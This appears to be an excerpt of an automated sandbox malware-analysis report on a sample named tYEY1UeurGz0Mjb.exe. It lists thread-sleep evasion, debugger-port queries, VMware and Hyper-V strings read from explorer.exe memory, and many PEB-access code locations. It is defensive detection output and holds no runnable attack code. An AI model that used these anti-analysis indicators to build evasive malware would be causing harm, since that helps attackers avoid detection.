          Source: C:\Windows\SysWOW64\wlanext.exe | Window / User API: threadDelayed 9239
          Source: C:\Windows\explorer.exe | Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) graph_4-13897
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | API coverage: 1.6 %
          Source: C:\Windows\SysWOW64\wlanext.exe | API coverage: 1.8 %
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe TID: 7096 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 2360 | Thread sleep count: 1877 > 30
          Source: C:\Windows\explorer.exe TID: 2360 | Thread sleep time: -3754000s >= -30000s
          Source: C:\Windows\explorer.exe TID: 2360 | Thread sleep count: 8068 > 30
          Source: C:\Windows\explorer.exe TID: 2360 | Thread sleep time: -16136000s >= -30000s
          Source: C:\Windows\SysWOW64\wlanext.exe TID: 4508 | Thread sleep count: 734 > 30
          Source: C:\Windows\SysWOW64\wlanext.exe TID: 4508 | Thread sleep time: -1468000s >= -30000s
          Source: C:\Windows\SysWOW64\wlanext.exe TID: 4508 | Thread sleep count: 9239 > 30
          Source: C:\Windows\SysWOW64\wlanext.exe TID: 4508 | Thread sleep time: -18478000s >= -30000s
          Source: C:\Windows\SysWOW64\wlanext.exe | Last function: Thread delayed
          Source: explorer.exe, 00000004.00000002.4452340558.00000000076F8000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
          Source: explorer.exe, 00000004.00000000.2007606048.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3094852288.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4454444252.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW0r
          Source: explorer.exe, 00000004.00000002.4455199777.0000000009C22000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000004.00000003.3777027124.0000000009BB0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: NXTcaVMWare
          Source: explorer.exe, 00000004.00000003.3096442625.0000000009C92000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000003.3094852288.0000000009B41000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
          Source: explorer.exe, 00000004.00000002.4450922376.0000000003552000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.
          Source: explorer.exe, 00000004.00000003.3096442625.0000000009C92000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000004.00000002.4450922376.0000000003552000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware-42 27 d9 2e dc 89 72 dX
          Source: explorer.exe, 00000004.00000000.2002630977.0000000000F13000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
          Source: explorer.exe, 00000004.00000002.4452340558.00000000076F8000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
          Source: explorer.exe, 00000004.00000002.4454444252.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3094852288.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2007606048.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000004.00000002.4450922376.0000000003552000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
          Source: explorer.exe, 00000004.00000002.4450922376.0000000003552000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware,p
          Source: explorer.exe, 00000004.00000002.4455199777.0000000009C22000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
          Source: explorer.exe, 00000004.00000003.3096442625.0000000009C92000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0#{5-
          Source: explorer.exe, 00000004.00000000.2002630977.0000000000F13000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: explorer.exe, 00000004.00000003.3094852288.0000000009B41000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000002.4452340558.000000000769A000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\wlanext.exe | Process queried: DebugPort
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_0040ACF0 LdrLoadDll,3_2_0040ACF0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_019CA197 mov eax, dword ptr fs:[00000030h]3_2_019CA197
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_019CA197 mov eax, dword ptr fs:[00000030h]3_2_019CA197
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_019CA197 mov eax, dword ptr fs:[00000030h]3_2_019CA197
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_01A8C188 mov eax, dword ptr fs:[00000030h]3_2_01A8C188
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_01A8C188 mov eax, dword ptr fs:[00000030h]3_2_01A8C188
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_01A10185 mov eax, dword ptr fs:[00000030h]3_2_01A10185
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_01A74180 mov eax, dword ptr fs:[00000030h]3_2_01A74180
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_01A74180 mov eax, dword ptr fs:[00000030h]3_2_01A74180
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_01A5019F mov eax, dword ptr fs:[00000030h]3_2_01A5019F
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_01A5019F mov eax, dword ptr fs:[00000030h]3_2_01A5019F
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_01A5019F mov eax, dword ptr fs:[00000030h]3_2_01A5019F
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_01A5019F mov eax, dword ptr fs:[00000030h]3_2_01A5019F
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_01AA61E5 mov eax, dword ptr fs:[00000030h]3_2_01AA61E5
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_01A001F8 mov eax, dword ptr fs:[00000030h]3_2_01A001F8
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_01A961C3 mov eax, dword ptr fs:[00000030h]3_2_01A961C3
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_01A961C3 mov eax, dword ptr fs:[00000030h]3_2_01A961C3
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_01A4E1D0 mov eax, dword ptr fs:[00000030h]3_2_01A4E1D0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_01A4E1D0 mov eax, dword ptr fs:[00000030h]3_2_01A4E1D0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_01A4E1D0 mov ecx, dword ptr fs:[00000030h]3_2_01A4E1D0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_01A4E1D0 mov eax, dword ptr fs:[00000030h]3_2_01A4E1D0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_01A4E1D0 mov eax, dword ptr fs:[00000030h]3_2_01A4E1D0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_01A00124 mov eax, dword ptr fs:[00000030h]3_2_01A00124
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_01A7E10E mov eax, dword ptr fs:[00000030h]3_2_01A7E10E
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_01A7E10E mov ecx, dword ptr fs:[00000030h]3_2_01A7E10E
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_01A7E10E mov eax, dword ptr fs:[00000030h]3_2_01A7E10E
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_01A7E10E mov eax, dword ptr fs:[00000030h]3_2_01A7E10E
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_01A7E10E mov ecx, dword ptr fs:[00000030h]3_2_01A7E10E
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_01A7E10E mov eax, dword ptr fs:[00000030h]3_2_01A7E10E
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_01A7E10E mov eax, dword ptr fs:[00000030h]3_2_01A7E10E
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_01A7E10E mov ecx, dword ptr fs:[00000030h]3_2_01A7E10E
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_01A7E10E mov eax, dword ptr fs:[00000030h]3_2_01A7E10E
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_01A7E10E mov ecx, dword ptr fs:[00000030h]3_2_01A7E10E
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_01A90115 mov eax, dword ptr fs:[00000030h]3_2_01A90115
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_01A7A118 mov ecx, dword ptr fs:[00000030h]3_2_01A7A118
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_01A7A118 mov eax, dword ptr fs:[00000030h]3_2_01A7A118
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_01A7A118 mov eax, dword ptr fs:[00000030h]3_2_01A7A118
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_01A7A118 mov eax, dword ptr fs:[00000030h]3_2_01A7A118
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_019D6154 mov eax, dword ptr fs:[00000030h]3_2_019D6154
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_019D6154 mov eax, dword ptr fs:[00000030h]3_2_019D6154
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_019CC156 mov eax, dword ptr fs:[00000030h]3_2_019CC156
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_01AA4164 mov eax, dword ptr fs:[00000030h]3_2_01AA4164
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_01AA4164 mov eax, dword ptr fs:[00000030h]3_2_01AA4164
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_01A64144 mov eax, dword ptr fs:[00000030h]3_2_01A64144
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_01A64144 mov eax, dword ptr fs:[00000030h]3_2_01A64144
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_01A64144 mov ecx, dword ptr fs:[00000030h]3_2_01A64144
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_01A64144 mov eax, dword ptr fs:[00000030h]3_2_01A64144
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_01A64144 mov eax, dword ptr fs:[00000030h]3_2_01A64144
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_01A68158 mov eax, dword ptr fs:[00000030h]3_2_01A68158
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_01A680A8 mov eax, dword ptr fs:[00000030h]3_2_01A680A8
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_01A960B8 mov eax, dword ptr fs:[00000030h]3_2_01A960B8
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_01A960B8 mov ecx, dword ptr fs:[00000030h]3_2_01A960B8
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_019D208A mov eax, dword ptr fs:[00000030h]3_2_019D208A
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_019C80A0 mov eax, dword ptr fs:[00000030h]3_2_019C80A0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_01A560E0 mov eax, dword ptr fs:[00000030h]3_2_01A560E0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_01A120F0 mov ecx, dword ptr fs:[00000030h]3_2_01A120F0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_019CC0F0 mov eax, dword ptr fs:[00000030h]3_2_019CC0F0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_019D80E9 mov eax, dword ptr fs:[00000030h]3_2_019D80E9
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_01A520DE mov eax, dword ptr fs:[00000030h]3_2_01A520DE
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_019CA0E3 mov ecx, dword ptr fs:[00000030h]3_2_019CA0E3
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_019EE016 mov eax, dword ptr fs:[00000030h]3_2_019EE016
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_019EE016 mov eax, dword ptr fs:[00000030h]3_2_019EE016
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_019EE016 mov eax, dword ptr fs:[00000030h]3_2_019EE016
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_019EE016 mov eax, dword ptr fs:[00000030h]3_2_019EE016
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_01A66030 mov eax, dword ptr fs:[00000030h]3_2_01A66030
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_01A54000 mov ecx, dword ptr fs:[00000030h]3_2_01A54000
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_01A72000 mov eax, dword ptr fs:[00000030h]3_2_01A72000
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe | Code function: 3_2_01A72000 mov eax, dword ptr fs:[00000030h]3_2_01A72000
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A72000 mov eax, dword ptr fs:[00000030h]3_2_01A72000
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A72000 mov eax, dword ptr fs:[00000030h]3_2_01A72000
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A72000 mov eax, dword ptr fs:[00000030h]3_2_01A72000
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A72000 mov eax, dword ptr fs:[00000030h]3_2_01A72000
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A72000 mov eax, dword ptr fs:[00000030h]3_2_01A72000
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A72000 mov eax, dword ptr fs:[00000030h]3_2_01A72000
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019CA020 mov eax, dword ptr fs:[00000030h]3_2_019CA020
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019CC020 mov eax, dword ptr fs:[00000030h]3_2_019CC020
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019D2050 mov eax, dword ptr fs:[00000030h]3_2_019D2050
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019FC073 mov eax, dword ptr fs:[00000030h]3_2_019FC073
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A56050 mov eax, dword ptr fs:[00000030h]3_2_01A56050
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019C8397 mov eax, dword ptr fs:[00000030h]3_2_019C8397
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019C8397 mov eax, dword ptr fs:[00000030h]3_2_019C8397
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019C8397 mov eax, dword ptr fs:[00000030h]3_2_019C8397
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019F438F mov eax, dword ptr fs:[00000030h]3_2_019F438F
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019F438F mov eax, dword ptr fs:[00000030h]3_2_019F438F
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019CE388 mov eax, dword ptr fs:[00000030h]3_2_019CE388
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019CE388 mov eax, dword ptr fs:[00000030h]3_2_019CE388
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019CE388 mov eax, dword ptr fs:[00000030h]3_2_019CE388
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019DA3C0 mov eax, dword ptr fs:[00000030h]3_2_019DA3C0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019DA3C0 mov eax, dword ptr fs:[00000030h]3_2_019DA3C0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019DA3C0 mov eax, dword ptr fs:[00000030h]3_2_019DA3C0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019DA3C0 mov eax, dword ptr fs:[00000030h]3_2_019DA3C0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019DA3C0 mov eax, dword ptr fs:[00000030h]3_2_019DA3C0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019DA3C0 mov eax, dword ptr fs:[00000030h]3_2_019DA3C0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019D83C0 mov eax, dword ptr fs:[00000030h]3_2_019D83C0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019D83C0 mov eax, dword ptr fs:[00000030h]3_2_019D83C0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019D83C0 mov eax, dword ptr fs:[00000030h]3_2_019D83C0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019D83C0 mov eax, dword ptr fs:[00000030h]3_2_019D83C0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A063FF mov eax, dword ptr fs:[00000030h]3_2_01A063FF
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A8C3CD mov eax, dword ptr fs:[00000030h]3_2_01A8C3CD
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A563C0 mov eax, dword ptr fs:[00000030h]3_2_01A563C0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019EE3F0 mov eax, dword ptr fs:[00000030h]3_2_019EE3F0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019EE3F0 mov eax, dword ptr fs:[00000030h]3_2_019EE3F0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019EE3F0 mov eax, dword ptr fs:[00000030h]3_2_019EE3F0
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A743D4 mov eax, dword ptr fs:[00000030h]3_2_01A743D4
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A743D4 mov eax, dword ptr fs:[00000030h]3_2_01A743D4
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E03E9 mov eax, dword ptr fs:[00000030h]3_2_019E03E9
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E03E9 mov eax, dword ptr fs:[00000030h]3_2_019E03E9
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E03E9 mov eax, dword ptr fs:[00000030h]3_2_019E03E9
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E03E9 mov eax, dword ptr fs:[00000030h]3_2_019E03E9
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E03E9 mov eax, dword ptr fs:[00000030h]3_2_019E03E9
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E03E9 mov eax, dword ptr fs:[00000030h]3_2_019E03E9
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E03E9 mov eax, dword ptr fs:[00000030h]3_2_019E03E9
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019E03E9 mov eax, dword ptr fs:[00000030h]3_2_019E03E9
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A7E3DB mov eax, dword ptr fs:[00000030h]3_2_01A7E3DB
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A7E3DB mov eax, dword ptr fs:[00000030h]3_2_01A7E3DB
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A7E3DB mov ecx, dword ptr fs:[00000030h]3_2_01A7E3DB
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A7E3DB mov eax, dword ptr fs:[00000030h]3_2_01A7E3DB
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019CC310 mov ecx, dword ptr fs:[00000030h]3_2_019CC310
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01AA8324 mov eax, dword ptr fs:[00000030h]3_2_01AA8324
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01AA8324 mov ecx, dword ptr fs:[00000030h]3_2_01AA8324
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01AA8324 mov eax, dword ptr fs:[00000030h]3_2_01AA8324
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01AA8324 mov eax, dword ptr fs:[00000030h]3_2_01AA8324
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_019F0310 mov ecx, dword ptr fs:[00000030h]3_2_019F0310
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A0A30B mov eax, dword ptr fs:[00000030h]3_2_01A0A30B
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A0A30B mov eax, dword ptr fs:[00000030h]3_2_01A0A30B
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A0A30B mov eax, dword ptr fs:[00000030h]3_2_01A0A30B
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A7437C mov eax, dword ptr fs:[00000030h]3_2_01A7437C
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01AA634F mov eax, dword ptr fs:[00000030h]3_2_01AA634F
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A52349 mov eax, dword ptr fs:[00000030h]3_2_01A52349
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A52349 mov eax, dword ptr fs:[00000030h]3_2_01A52349
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A52349 mov eax, dword ptr fs:[00000030h]3_2_01A52349
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A52349 mov eax, dword ptr fs:[00000030h]3_2_01A52349
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A52349 mov eax, dword ptr fs:[00000030h]3_2_01A52349
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A52349 mov eax, dword ptr fs:[00000030h]3_2_01A52349
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A52349 mov eax, dword ptr fs:[00000030h]3_2_01A52349
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A52349 mov eax, dword ptr fs:[00000030h]3_2_01A52349
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A52349 mov eax, dword ptr fs:[00000030h]3_2_01A52349
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A52349 mov eax, dword ptr fs:[00000030h]3_2_01A52349
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A52349 mov eax, dword ptr fs:[00000030h]3_2_01A52349
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exeCode function: 3_2_01A52349 mov eax, dword ptr fs:[00000030h]3_2_01A52349
